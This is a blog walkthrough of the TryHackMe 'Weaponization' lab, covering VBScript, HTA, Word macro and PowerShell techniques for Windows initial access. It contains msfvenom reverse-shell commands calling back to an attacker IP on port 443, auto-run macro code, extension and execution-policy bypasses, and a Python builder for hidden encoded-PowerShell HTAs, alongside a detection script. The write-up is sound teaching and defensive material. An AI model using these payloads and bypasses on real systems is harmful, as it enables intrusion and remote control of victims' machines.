Penetrating Networks

Navid Fazle Rabbi
Sr. Security Researcher
Offensive Security Research
bKash Ltd.

TryHackMe | Weaponization

September 17, 2022

In this post I walk through the TryHackMe room Weaponization in brief. Weaponization is the process of pairing an exploit with a backdoor (a payload that calls back to the attacker) inside a file that can be delivered to the target.

The room explains the common weaponization techniques; the name comes from the Weaponization phase of Lockheed Martin’s Cyber Kill Chain.

What is Weaponization?

Weaponization is the second step of the Cyber Kill Chain. In this stage the attacker packages malicious code into a deliverable payload such as a Word document or a PDF. The goal is to get that payload executed on the target machine so that it provides initial access.

The image shows an example of weaponization: a malicious payload embedded in a custom PDF or Microsoft Office document. The payload is configured to connect back to the red team infrastructure’s command-and-control (C2) environment.

The room concentrates on weaponization against Windows. Windows is by far the most common desktop OS in the environments red teams target, so knowing how to weaponize for it is essential.

The room covers scripting technologies that are popular and effective for this purpose:

  • Windows Script Host (WSH)
  • HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

Windows Scripting Host (WSH)

Windows Script Host (WSH) is a built-in Windows component for automating and administering the operating system. It executes scripts written in VBScript and JScript (.vbs, .vbe, .js, .jse and .wsf files); batch (.bat) files are handled by cmd.exe, not by WSH.

cscript.exe and wscript.exe are the two hosts that run VBScript files (.vbs and .vbe). The only difference between them is the subsystem they are built for: wscript.exe is a Windows (GUI) application, so output such as WScript.Echo appears in a dialog box, while cscript.exe is a console application that writes to the terminal.

It is essential to understand that scripts run by the VBScript engine execute with the privileges of the user who launched them, exactly like any other program that user starts. No elevation is involved, but a standard user’s rights are all that initial access needs, which is what makes WSH useful to red teamers.

Your First VBScript Code

Open Notepad or your favourite code editor, write the following code and save the file with a .vbs extension:

Dim message                ' Declare the variable
message = "Hello World!!"  ' Assign a value to it
MsgBox message             ' Show the variable's content in a message box

Run the file with wscript.exe or cscript.exe.

Now let’s use VBScript to launch an executable. The following code starts the Windows calculator, which shows that .exe files can be run from the native WSH engine.

Set shell = WScript.CreateObject("WScript.Shell")
' Run(command, windowStyle, waitOnReturn): 0 hides the window, True waits for the process to exit
shell.Run "C:\Windows\System32\calc.exe", 0, True

So what’s going on here? CreateObject from the WScript library instantiates a WScript.Shell object, and its Run method starts the command we give it, in this case the calculator. The second argument (0) is the window style and the third (True) tells the script to wait until the process exits.

If .vbs files are blocked by an extension blacklist, we can rename the file to .txt and still run it with wscript.exe or cscript.exe.

The /e:VBScript switch (documented as //E:VBScript) tells the host to use the VBScript engine regardless of the file extension, so the .txt file runs as VBScript. Note that this only defeats filters keyed on the extension: the script still executes under wscript.exe or cscript.exe and is just as visible to process-level monitoring.

HTML Application (HTA)

HTA is short for “HTML Application”: a file that bundles an HTML page with everything needed to display and run it. HTAs are dynamic HTML pages carrying JScript or VBScript, and because they run outside the browser sandbox their scripts can use ActiveX objects such as WScript.Shell. They are executed by mshta.exe, a native Windows binary catalogued by the LOLBAS (Living Off The Land Binaries and Scripts) project; it can be invoked directly or through Internet Explorer.

HTA will be covered in three ways:

  • Manual
  • Using msfvenom
  • Using Metasploit (persistence enabled)

Manual

In this example we create a .hta file and host it so that the victim downloads and executes it.

As a proof of concept, the payload uses an ActiveXObject to execute cmd.exe.

ActiveX controls are Microsoft software components that let applications reuse functionality (showing a calendar, playing a video) without implementing it themselves. Most were built as plugins for Internet Explorer, and in an HTA the same ActiveX mechanism exposes COM objects such as WScript.Shell to script.

Consider the following HTML. Inside the <script> tag a variable ‘c’ holds the command cmd.exe; an ActiveXObject then instantiates the WScript.Shell object, whose Run method executes the command in ‘c’.

<html>
<body>
<script language="JScript">
    // command to execute; the WScript.Shell COM object is reached through ActiveX
    var c = 'cmd.exe';
    new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Save this with a .hta extension and serve it from the attacking machine over HTTP (for example with Python’s http.server module).

Browsing to the URL from the victim, we can reach the .hta. Downloading it, we get the following prompt:

Now let’s run the file:

Once we press Run, the .hta executes and launches cmd.exe. The figure shows cmd.exe running.

So what’s going on here? The following image shows the whole chain in a nutshell: mshta.exe loads the HTA, the JScript creates WScript.Shell through ActiveX, and Run starts cmd.exe.

Using msfvenom

Let’s first write down the plan:

  • Use msfvenom to generate a reverse-shell payload in HTA format. The payload does not listen; it connects back to the attacker’s machine on port 443, so we run a listener there. The .hta itself is served from the attacker’s machine by a web server on any convenient port.
  • When the victim browses to the URL and runs the .hta, the reverse shell connects to the attacker’s port 443.

Generating payload using msfvenom,

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.41.165 LPORT=443 -f hta-psh -o dl28.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7766 bytes
Saved as: dl28.hta

We give msfvenom a payload (windows/x64/shell_reverse_tcp), the listening host (the attacker’s IP) and the listening port (443 on the attacker). -f hta-psh asks for HTA output that launches the payload through PowerShell, and -o writes the result to dl28.hta.

Now start a netcat listener on port 443.

From the Windows machine we see the following:

We can see that our payload is served. Now download and run it:

The reverse connection works. We now have a shell on the Windows host and can run any command.
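The hta-psh format is worth understanding rather than treating as a black box. The following Python script is an added example, not the page’s or Metasploit’s own code: it builds an HTA with the same mechanism as the manual one above, except that WScript.Shell launches a hidden powershell.exe carrying an encoded command, which is how an hta-psh file hands its PowerShell stager over. PowerShell’s -EncodedCommand takes base64 over the UTF-16LE bytes of the script text. The sample command (Start-Process calc.exe) is a constructed, benign stand-in for a reverse-shell stager, and the HTA:APPLICATION attributes are my choice, not something the page specifies.

```python
"""Added example: build an HTA launcher around an encoded PowerShell command.

Not the page's own code. The <script> block uses the same
ActiveXObject("WScript.Shell").Run call as the manual HTA on the page, but
starts a hidden PowerShell process with a -EncodedCommand instead of cmd.exe.
"""
import base64

# Constructed, benign stand-in for a real stager: opens the calculator, as the
# page's VBScript and VBA proofs of concept do.
SAMPLE_COMMAND = "Start-Process calc.exe"


def encode_powershell(command: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects it:
    base64 over the UTF-16LE bytes of the text (no BOM)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Reverse of encode_powershell; the same decoding an analyst applies."""
    return base64.b64decode(encoded).decode("utf-16-le")


def build_launcher(encoded: str) -> str:
    """The one-liner handed to WScript.Shell.
    -nop: no profile, -w hidden: no console window, -e: encoded command."""
    return f"powershell.exe -nop -w hidden -e {encoded}"


def build_hta(command: str) -> str:
    """Return the text of a .hta file that launches `command` through WSH."""
    launcher = build_launcher(encode_powershell(command))
    # The launcher is placed in a JScript string literal. It contains only the
    # base64 alphabet, spaces and flags, so nothing needs escaping.
    return (
        "<html>\n<head>\n"
        '<HTA:APPLICATION ID="app" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />\n'
        "</head>\n<body>\n"
        '<script language="JScript">\n'
        f"  var c = '{launcher}';\n"
        "  new ActiveXObject('WScript.Shell').Run(c, 0, false);\n"
        "  window.close();\n"
        "</script>\n</body>\n</html>\n"
    )


if __name__ == "__main__":
    print(build_hta(SAMPLE_COMMAND))
```

Run(c, 0, false) uses the same window-style argument as the VBScript example earlier (0 = hidden) and does not wait, so the HTA can close itself immediately. The encoded string is also exactly what shows up in the process command line of powershell.exe on the victim, which is why decode_powershell is the first thing a defender runs against it.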

Using Metasploit

We use the Metasploit module exploit/windows/misc/hta_server. It hosts the HTA for us and requires LHOST, LPORT, SRVHOST and a payload to be set. Let’s assign those values and run the exploit.

After the victim browses to the URL, Metasploit reports a session, which tells us we are inside the victim host.

Visual Basic for Applications

VBA stands for “Visual Basic for Applications”, a Microsoft programming language embedded in Office applications such as Word, Excel and PowerPoint. Macros are VBA code stored inside an Office document; they are intended for custom functions that automate repetitive tasks. VBA can also call the Windows API and other low-level functions, which is what makes it attractive for weaponization.

In this task we learn how to write macros and then how to use them maliciously.

First, let’s see how to create a macro:

From View > Macros we get the Macros dialog.

Now give the macro a name, choose which document it belongs to from the “Macros in” dropdown, and hit Create:

After hitting Create, the Microsoft Visual Basic for Applications editor opens and gives us a place to write our VBA code.

To start with a simple piece of VBA, let’s write a Hello World prompt.

After running this code we get the following:

We have written our first macro. Now let’s make it run automatically when the document opens. Word looks for specially named procedures such as AutoOpen and Document_Open and runs them on open, so we call the procedure we want, in our case DL28, from one of them.

For the macro to survive saving, the file must be in a macro-enabled format such as .doc or .docm; the default .docx strips macros. Let’s save the file as a Word 97-2003 Document (File > Save > Save as type > Word 97-2003 Document), close it, and reopen it from where it was saved. We see the following:

Microsoft Word shows a security warning that macros have been disabled and offers to enable them. Let’s enable them and see the result.

We now know that code runs as soon as the document is opened. Let’s use VBA to run an executable; in this PoC we open the calculator.

Let’s change the code inside the DL28 procedure to the following:

Sub DL28()
    Dim payload As String                         ' Declare the payload variable as a string
    payload = "calc.exe"                          ' Assign the command we want to run
    CreateObject("Wscript.Shell").Run payload, 0  ' Create the WSH Shell object and run the payload; 0 hides the window
End Sub

What is happening here? As in the VBScript example, CreateObject instantiates WScript.Shell and Run starts the process, only now the call is made from inside Word.

Save and run the document as before:

We can see that it executes.

Let’s use msfvenom to generate a VBA payload and Metasploit to catch the reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.41.165 LPORT=443 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of vba file: 2698 bytes

This creates a Meterpreter payload with our LHOST and LPORT in VBA format. Running the command gives the following macro:

The generated macro is written for Excel workbooks (it hooks Workbook_Open); to make it fire in a Word document, rename Workbook_Open to Document_Open.

Now copy the output into the macro editor of the Word document as shown earlier, save it in a macro-enabled format, and host the file on an HTTP server.

Start Metasploit and open a listener (exploit/multi/handler with the same payload, LHOST and LPORT).

Once the listener is up and the victim opens the document and enables macros, we receive a Meterpreter session on the victim’s machine.

PowerShell

PowerShell is an object-oriented shell and scripting language built on .NET (with some exceptions for legacy components). Red teamers use it for initial access, system enumeration and much more. First, let’s write a simple PowerShell script that prints “Hello World!!”.

Write the following in Notepad or a code editor and save it with a .ps1 extension:

Write-Output "Hello World!!"

Now let’s execute it with PowerShell:

Running it from the command line usually produces the following error:

This is PowerShell’s execution policy at work. On Windows client editions the policy defaults to Restricted, which allows individual commands at the prompt but refuses to run script files, so a .ps1 will not execute out of the box. Microsoft documents the execution policy as a safeguard against running scripts accidentally, not as a security boundary, and that distinction matters for what follows.

We can see that by default it is set to Restricted (Get-ExecutionPolicy shows the current value), and we can change it with Set-ExecutionPolicy:

Microsoft also provides ways around the limit that do not touch the machine-wide setting. One is an argument on the powershell.exe command line, -ExecutionPolicy Bypass, which disables the check for that one process so that nothing is blocked or restricted. This is what lets us run our own scripts on a target. Reverting the policy to Restricted and running the script with the bypass, we get the following:
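Every technique above leaves a consistent trace on the endpoint, which is the check a defender, or a red teamer testing evasion, wants to have. The following Python script is an added example and not part of the original post: it scans a handful of constructed, Sysmon-style process-creation records (the field names ParentImage, Image and CommandLine and the records themselves are assumptions for the example, not a real log export) and flags the chains produced in the WSH, HTA, VBA and PowerShell sections: an Office application or a script host (wscript, cscript, mshta) spawning cmd or powershell, a script host launched with an explicit /e: engine switch, and powershell started with -ExecutionPolicy Bypass or an -EncodedCommand, which it decodes for the analyst.

```python
"""Added example (not the page's own code): flag the process chains left by
the WSH, HTA, VBA and PowerShell techniques described above.

Input is a list of constructed, Sysmon-style process-creation records. The
field names (ParentImage, Image, CommandLine) are an assumption made for the
example and the records are made up, not a real export.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample records: one benign line plus one per technique.
SAMPLE_RECORDS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\notepad.exe",
     "CommandLine": "notepad.exe hello.vbs"},
    # Manual HTA: mshta runs the JScript that starts cmd.exe
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    # hta-psh style: hidden PowerShell with an encoded command ("calc")
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -e YwBhAGwAYwA="},
    # WSH blacklist trick: a .txt file forced through the VBScript engine
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "wscript.exe /e:VBScript payload.txt"},
    # Word macro spawning PowerShell with the execution policy bypassed
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File dl28.ps1"},
]


@dataclass
class Finding:
    record: int  # 1-based index into the input list
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand value, or None if there is none.

    PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is base64
    over the UTF-16LE bytes of the script text. Malformed values yield None.
    """
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(records) -> list:
    """Apply the four rules to every record and collect the findings."""
    findings = []
    for i, rec in enumerate(records, 1):
        parent = _basename(rec["ParentImage"])
        image = _basename(rec["Image"])
        cmdline = rec["CommandLine"]
        if parent in OFFICE_APPS and image in SHELLS | SCRIPT_HOSTS:
            findings.append(Finding(i, "office-spawns-shell", f"{parent} -> {image}"))
        if parent in SCRIPT_HOSTS and image in SHELLS:
            findings.append(Finding(i, "script-host-spawns-shell", f"{parent} -> {image}"))
        if image in {"wscript.exe", "cscript.exe"} and re.search(r"(?i)(?:^|\s)//?e:", cmdline):
            findings.append(Finding(i, "explicit-script-engine", cmdline))
        if image in {"powershell.exe", "pwsh.exe"}:
            # -ep / -ex / -exec are the abbreviations PowerShell accepts for -ExecutionPolicy
            if re.search(r"(?i)-(?:ep|ex|exec|executionpolicy)\s+bypass", cmdline):
                findings.append(Finding(i, "execution-policy-bypass", cmdline))
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                findings.append(Finding(i, "encoded-command", decoded))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS):
        print(f"record {f.record}: {f.rule}: {f.detail}")
```

The point of the last rule is the caveat from the execution-policy discussion: -ExecutionPolicy Bypass gets a script running, but it does so in plain sight on the process command line, and so does the base64 blob behind -e, which decodes with two standard library calls.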

Delivery Techniques

The delivery method is one of the most important parts of getting initial access. The content has to look professional, genuine and convincing to the victim. Common methods are:

  • Email Delivery
  • Web Delivery
  • USB Delivery

Practice Arena

The task asks us to start a reverse shell to the remote server and retrieve the flag.

After starting the machine we get the following web page.

Payloads can be uploaded through the web application as VBS, DOC or PS1 files. Alternatively, if we give the application a link to a malicious HTA, it will browse to that link.

Let’s use Metasploit (hta_server, as above) to host an HTA and give the application the URL, so that the simulated user browses to it and hands us a reverse shell.

Providing the link to the server:

We are in. The flag turned up after a little digging around.
